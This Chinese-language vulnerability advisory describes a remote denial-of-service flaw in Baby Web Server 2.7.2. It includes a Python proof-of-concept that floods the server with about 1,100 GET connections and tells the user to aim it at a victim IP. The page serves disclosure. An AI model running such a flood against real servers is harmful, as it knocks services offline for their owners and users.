Pablo Software Solutions Baby Web Server多个远程拒绝服务漏洞

漏洞起因
异常条件处理失败错误
 
影响系统
Pablo Software Solutions Baby Web Server 2.7.2
 
不受影响系统
 
危害
远程攻击者可以利用漏洞对系统进行拒绝服务攻击。
 
攻击所需条件
攻击者必须访问Baby Web Server。
 
漏洞信息
Pablo Software Solutions Baby Web Server是一款WEB服务程序。
Baby Web Server不正确处理用户提交的GET请求,远程攻击者可以利用漏洞对系统进行拒绝服务攻击。
 
测试方法
#!/usr/bin/env python
#Author:Asheesh Kumar Mani Tripathi
#Created:Asheesh Kumar Mani Tripathi
import socket
print "****************************************************"
print "Baby Web Server 2.7.2 Vulnerbility found Denial of Service"
print "Change IP to Victim Server s.connect((127.0.0.1,80))"
print "Author: Asheesh Kumar Mani Tripathi"
print "Reason for DOS attack The Problem lies server"
print "unable to handle so much of  requests "
print "*****************************************************"
host = "127.0.0.1"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   conn = s.connect(("127.0.0.1",80))
   for i in range (1,1100):
       request =  "GET /some.txt HTTP/1.1 \n\n"
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       print i
except:
   print "Oh! Some Problem Occured Check Server is Running or Not"
 
厂商解决方案
目前没有解决方案提供:
http://www.pablosoftwaresolutions.com/html/baby_web_server.html
 
漏洞提供者
Asheesh kumar Mani Tripathi

发表评论?

0 条评论。

发表评论